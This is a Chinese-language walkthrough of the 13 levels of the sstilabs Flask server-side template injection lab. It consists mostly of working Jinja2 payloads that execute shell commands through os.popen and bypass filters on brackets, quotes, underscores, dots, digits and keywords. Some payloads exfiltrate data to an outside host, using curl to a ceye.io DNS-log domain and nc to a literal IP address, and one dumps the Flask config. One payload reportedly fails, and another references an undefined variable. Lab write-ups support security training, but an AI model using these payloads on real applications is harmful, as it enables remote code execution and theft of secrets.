flask ssti lab闯关记录
sstilab是一个模板注入的靶场,目前只有Flask模板注入的练习
地址:https://github.com/X3NNY/sstilabs
level 1
判断出是post方法
借用bp的intrude模块查看可以利用的类,这里查找的模块是__import__
发现80、81、82、83可以有__import__
模块,加以利用得到payload
{{[].__class__.__base__.__subclasses__()[80].__init__.__globals__['__import__']('os').popen("cat flag").read()}}
打过去获得flag
还可以尝试其他模块,比如__builtins__
,popen
,os
,sys
。
# __builtins__
{{().__class__.__base__.__subclasses__()[80].__init__.__globals__.__builtins__['__import__']('os').popen('cat flag').read()}}
# popen
{{().__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat flag').read()}}
# os
{{().__class__.__base__.__subclasses__()[213].__init__.__globals__['os'].popen('cat flag').read()}}
level 2
过滤了{ }
,用{%%}
替代。这里有两种方法绕过
-
print标记
{%print [].__class__.__base__.__subclasses__()[80].__init__.__globals__['__import__']('os').popen("cat flag").read()%}
-
dnslog外带
{% if ().__class__.__base__.__subclasses__()[80].__init__.__globals__['__import__']('os').popen("curl `cat flag`.0ppgif.ceye.io").read()=='ssti' %}1{% endif %}
level 3
这道是盲注,有两种方法绕过
-
dnslog外带
{% for i in ''.__class__.__mro__[-1].__subclasses__() %}{% if i.__name__=='Popen' %}{{ i.__init__.__globals__['os'].popen('curl http://`cat flag`.0ppgif.ceye.io').read()}}{% endif %}{% endfor %}
-
通过
nc
命令将文件内容回显到自己的服务器上{% for i in ''.__class__.__mro__[-1].__subclasses__() %}{% if i.__name__=='Popen' %}{{ i.__init__.__globals__['os'].popen('cat flag|nc 119.91.214.224 1234').read()}}{% endif %}{% endfor %}
level 4
过滤了[ ]
,这里有两种情况下的过滤
- 使用
pop
或__getitem__()
代替索引中的[]
- 使用
__getattribute__
代替魔术方法中的[]
# os
{{().__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(213).__init__.__globals__.__getitem__('os').popen('cat flag').read()}}
# popen
{{().__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(132).__init__.__globals__.__getitem__('popen')('cat flag').read()}}
# 一句话
{% for i in ''.__class__.__mro__.__getitem__(-1).__subclasses__() %}{% if i.__name__=='Popen' %}{{ i.__init__.__globals__.__getitem__('os').popen('cat flag').read()}}{% endif %}{% endfor %}
level 5
过滤了单、双引号,有两种方法绕过
-
request绕过
#post # __builtins__ {{().__class__.__base__.subclasses__()[80].__init__.__globals__.__builtins__[request.values.arg1](request.values.arg2).popen(request.values.arg3).read()}} POST:arg1=__import__,arg2=os,arg3=popen # popen {{().__class__.__base__.subclasses__()[132].__init__.__globals__[request.values.arg1](request.values.arg2).read()}} POST:arg1=popen,arg2=cat flag # os {{().__class__.__base__.subclasses__()[213].__init__.__globals__[request.values.arg1].popen(request.values.arg2).read()}} POST:arg1=popen,arg2=cat flag #cookie # popen {{().__class__.__base__.subclasses__()[132].__init__.__globals__[request.cookies.arg1](request.cookies.arg2).read()}} Cookie:arg1=popen,arg2=cat flag
-
chr绕过
先找出
chr()
函数的位置{{().__class__.__mro__[-1].__subclasses__()[0].__init__.__globals__.__builtins__.chr}}
{%set chr=[].__class__.__mro__[-1].__subclasses__()[58].__init__.__globals__.__builtins__.chr%}
{%print(().__class__.__mro__[-1].__subclasses__()[258].__init__.__globals__[chr(111)%2bchr(115)].popen(chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)).read())%}
不过这个没成功,不知道什么原因。
level 6
绕过下划线_
,使用十六进制编码绕过,_
编码后为\x5f
先进行替换
string1 = "{{().__class__.__base__.__subclasses__()[213].__init__.__globals__['os'].popen('cat flag').read()}}"
def tohex(string):
result = ""
for i in range(len(string)):
if string[i] == '_':
result += "\\x"+hex(ord(string[i]))[2:]
continue
result += string[i]
print(result)
tohex(string1)
再添加[""],得到
{{()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbase\x5f\x5f"]["\x5f\x5fsubclasses\x5f\x5f"]()[213]["\x5f\x5finit\x5f\x5f"]["\x5f\x5fglobals\x5f\x5f"]['os'].popen('cat flag').read()}}
- Unicode编码
{{lipsum|attr("\u005f\u005fglobals\u005f\u005f")|attr("\u005f\u005fgetitem\u005f\u005f")("os")|attr("popen")("cat flag")|attr("read")()}}
这里使用了lipsum这个方法直接调用os
- base64编码
{{()|attr('X19jbGFzc19f'.decode('base64'))|attr('X19iYXNlX18='.decode('base64'))|attr('X19zdWJjbGFzc2VzX18='.decode('base64'))()|attr('X19nZXRpdGVtX18='.decode('base64'))(213)|attr('X19pbml0X18='.decode('base64'))|attr('X19nbG9iYWxzX18='.decode('base64'))|attr('X19nZXRpdGVtX18='.decode('base64'))('os')|attr('popen')('cat flag')|attr('read')()}}
attr()
配合request
{{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}}
x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat f*').read()
level 7
过滤了.
-
[]
绕过{{()['__class__']['__base__']['__subclasses__']()[213]['__init__']['__globals__']['os']['popen']('cat flag')['read']()}}
-
attr()
绕过{{()|attr('__class__')|attr('__base__')|attr('__subclasses__')()|attr('__getitem__')(213)|attr('__init__')|attr('__globals__')|attr('__getitem__')('os')|attr('popen')('cat flag')|attr('read')()}}
level 8
WAF: bl[“class”, “arg”, “form”, “value”, “data”, “request”, “init”, “global”, “open”, “mro”, “base”, “attr”]
过滤了一堆关键字
-
+
拼接绕过# popen {{()['__cl'+'ass__']['__ba'+'se__']['__subc'+'lasses__']()['__getitem__'](132)['__in'+'it__']['__gl'+ 'obals__']['__getitem__']('po'+'pen')('cat flag').read()}} # os {{()['__cl'+'ass__']['__ba'+'se__']['__subcl'+'asses__']()['__getitem__'](213)['__in'+'it__']['__gl'+'obals__']['__getitem__']('os')['po'+'pen']('cat flag')['read']()}}
level 9
过滤了数字
- 用循环找到能利用的类直接用
{% for i in ''.__class__.__base__.__subclasses__() %}{% if i.__name__=='Popen' %}{{ i.__init__.__globals__.__getitem__('os').popen('cat flag').read()}}{% endif %}{% endfor %}
- 用lipsum不通过数字直接利用
{{lipsum|attr("__globals__")|attr("__getitem__")("os")|attr("popen")("cat flag")|attr("read")()}}
- 构造数字进行拼接
首先构造数字
{%set zero=([]|string|list).index('[')%}
{%set one=dict(a=a)|join|count%}
{%set two=dict(aa=a)|join|count%}
{%set three=dict(aaa=a)|join|count%}
{%set four=dict(aaaa=a)|join|count%}
{%set five=dict(aaaaa=a)|join|count%}
{%set six=dict(aaaaaa=a)|join|count%}
{%set seven=dict(aaaaaaa=a)|join|count%}
{%set eight=dict(aaaaaaaa=a)|join|count%}
{%set nine=dict(aaaaaaaaa=a)|join|count%}
然后拼接数字,这里以213为例
{% set erwuba=(two~one~three)|int %}
最终payload
{%set one=dict(a=a)|join|count%}
{%set two=dict(aa=a)|join|count%}
{%set three=dict(aaa=a)|join|count%}
{% set eryisan=(two~one~three)|int %}
{{().__class__.__base__.__subclasses__()[eryisan].__init__.__globals__['os'].popen('cat flag').read()}}
level 10
WAF: set config = None
这一关的目标不是flag,而是获取config,可以通过current_app
来获取
- url_for
{{url_for.__globals__['current_app'].config}}
- get_flashed_messages
{{get_flashed_messages.__globals__['current_app'].config}}
level 11
**WAF: bl[’’’, ‘"’, ‘+’, ‘request’, ‘.’, ‘[’, ‘]’] **
11关过滤了一堆东西,先确定一个利用的基本payload
{{lipsum|attr("__globals__")|attr("__getitem__")("os")|attr("popen")("cat flag")|attr("read")()}}
然后再构造变量来绕过,思路为:利用set来定义变量,使用attr()来提取使用变量绕过点,中括号。但是这样存在一个问题是需要获取下划线,这里通过lipsum来获取下划线。
首先查看_
在第几个
{{(lipsum|string|list)}}
得到,这里是下标18为下划线
Hello ['<', 'f', 'u', 'n', 'c', 't', 'i', 'o', 'n', ' ', 'g', 'e', 'n', 'e', 'r', 'a', 't', 'e', '_', 'l', 'o', 'r', 'e', 'm', '_', 'i', 'p', 's', 'u', 'm', ' ', 'a', 't', ' ', '0', 'x', '7', 'f', '7', '4', '1', '9', '6', '1', 'c', '6', '7', '0', '>']
{{(lipsum|string|list)|attr(pop)(18)}}
这里问题来了,attr()
里面要求的是字符串,直接输pop需要用引号''
包围起来,但是这里又过滤了引号,所以要先构造一个pop
字符串:
{% set pop=dict(pop=a)|join %}
{% xiahuaxian=(lipsum|string|list)|attr(pop)(18)%}
此时就能成功取到_,在用下划线去构造其他的类:
{% set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join%}
{% set getitem=(xiahuaxian,xiahuaxian,dict(getitem=a)|join,xiahuaxian,xiahuaxian)|join%}
再去构造其他用到的方法:
{% set space=(lipsum|string|list)|attr(pop)(9)%}
{% os=dict(os=a)|join%}
{% set popen=dict(popen=a)|join%}
{% set cat=dict(cat=a)|join%}
{% set cmd=(cat,space,dict(flag=a)|join)|join%}
{% set read=dict(read=a)|join%}
最后就是完整的利用语法:
{{lipsum|attr(globals)|attr(getitem)(os)|attr(popen)(cmd)|attr(read)()}}
整合在一起就是
{% set pop=dict(pop=a)|join %}
{% set xiahuaxian=(lipsum|string|list)|attr(pop)(18)%}
{% set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join%}
{% set getitem=(xiahuaxian,xiahuaxian,dict(getitem=a)|join,xiahuaxian,xiahuaxian)|join%}
{% set space=(lipsum|string|list)|attr(pop)(9)%}
{% set os=dict(os=a)|join%}
{% set popen=dict(popen=a)|join%}
{% set cat=dict(cat=a)|join%}
{% set cmd=(cat,space,dict(flag=a)|join)|join%}
{% set read=dict(read=a)|join%}
{{lipsum|attr(globals)|attr(getitem)(os)|attr(popen)(cmd)|attr(read)()}}
level 12
WAF:bl[’_’, ‘.’, ‘0-9’, ‘\’, ‘’’, ‘"’, ‘[’, ‘]’]
这关还对数字进行了过滤,也就是在上一关的payload基础上,设置一下数字的获取
{%set nine=dict(aaaaaaaaa=a)|join|count%}
{%set eighteen=nine+nine%}
{% set pop=dict(pop=a)|join %}
{% set xiahuaxian=(lipsum|string|list)|attr(pop)(e)%}
{% set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join%}
{% set getitem=(xiahuaxian,xiahuaxian,dict(getitem=a)|join,xiahuaxian,xiahuaxian)|join%}
{% set space=(lipsum|string|list)|attr(pop)(nine)%}
{% set os=dict(os=a)|join%}
{% set popen=dict(popen=a)|join%}
{% set cat=dict(cat=a)|join%}
{% set cmd=(cat,space,dict(flag=a)|join)|join%}
{% set read=dict(read=a)|join%}
{{lipsum|attr(globals)|attr(getitem)(os)|attr(popen)(cmd)|attr(read)()}}
level 13
WAF:bl[’_’, ‘.’, ‘\’, ‘’’, ‘"’, ‘request’, ‘+’, ‘class’, ‘init’, ‘arg’, ‘config’, ‘app’, ‘self’, ‘[’, ‘]’]
增加了一些关键字以及+
的过滤,直接用11的payload即可,或者改一下12关的payload
{%set one=dict(a=a)|join|count%}
{%set eight=dict(aaaaaaaa=a)|join|count%}
{%set nine=dict(aaaaaaaaa=a)|join|count%}
{%set eighteen=(one~eight)|int%}
{% set pop=dict(pop=a)|join %}
{% set xiahuaxian=(lipsum|string|list)|attr(pop)(eighteen)%}
{% set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join%}
{% set getitem=(xiahuaxian,xiahuaxian,dict(getitem=a)|join,xiahuaxian,xiahuaxian)|join%}
{% set space=(lipsum|string|list)|attr(pop)(nine)%} {% set os=dict(os=a)|join%}
{% set popen=dict(popen=a)|join%} {% set cat=dict(cat=a)|join%}
{% set cmd=(cat,space,dict(flag=a)|join)|join%} {% set read=dict(read=a)|join%}
{{lipsum|attr(globals)|attr(getitem)(os)|attr(popen)(cmd)|attr(read)()}}